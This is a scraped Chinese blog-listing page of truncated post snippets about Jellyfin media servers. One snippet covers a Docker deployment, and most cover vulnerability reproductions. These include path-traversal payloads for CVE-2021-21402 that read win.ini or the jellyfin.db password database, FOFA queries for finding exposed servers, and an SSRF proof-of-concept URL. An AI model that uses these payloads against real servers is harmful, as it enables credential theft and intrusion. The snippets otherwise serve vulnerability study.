自述giegie,我没有群晖nas怎么办?哈!你小呆呆啊,这不有树莓派、电脑、手机么你真以为电视盒子不是装了一套嵌入式系统而已啊(如今的电视也嵌入了系统)把你废旧的设备拿出来,又是一台新功能的电视了再...
11月20日58 views评论deskto
media
docker搭建jellyfin部署视频库、私人电视
11月20日58 views评论deskto
media
11月20日58 views评论deskto
media
Jellyfin 任意文件读取漏洞(CVE-2021-21402)
fofa语句:title="Jellyfin"我们随便点一个进入接着我们使用POCGET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows...
07月31日50 views评论audio
任意文件读取漏洞
经典Jellyfin 任意文件读取
术之尽头,炁体源流构造payload:/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/漏洞证明文笔生疏,...
06月17日67 views评论csdn
任意文件读取
Jellyfin SSRF
无善无恶心之体,有善有恶意之动,知善知恶是良知,为善去恶是格物构造请求POC:http://xxx/Images/Remote?imageUrl=https://www.baidu.com漏洞证明:文...
06月10日32 views评论csdn
ssrf
关于CVE-2023-27161 Jellyfin流媒体系统存在SSRF漏洞的学习
漏洞描述:Jellyfin 直到 v10.7.7 通过组件 /Repository 包含服务器端请求伪造 (SSRF)。此漏洞允许攻击者通过构建的 POST 请求访问网络资源和敏感信息。环境及部署说明...
03月17日59 views关于CVE-2023-27161 Jellyfin流媒体系统存在SSRF漏洞的学习已关闭评论centos
yum
Jellyfin - CVE-2021-21402 任意文件读取漏洞
漏洞背景 Jellyfin允许读取未经身份验证的任意文件漏洞复现祭出fofa关键字title="jellyfin" 有条件的排除蜜罐漏洞利用可以读取未经身份验证的任意文件/Audio/{Id...
08月28日77 views评论任意文件读取漏洞
身份验证
Jellyfin任意文件读取复现
Jellyfin任意文件读取复现POC:GET /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ HTTP/1.1GET /Videos/anyt...
04月13日75 views评论c
jellyfin
Jellyfin任意文件读取漏洞(CVE-2021-21402)
CVE-2021-21402 Jellyfin任意文件读取
FOFA:title="Jellyfin"影响版本:jellyfin<=10.7.0POC1:从服务器下载带有密码的jellyfin.db:GET /Audio/anything/hls/..%...
04月08日206 views评论db
http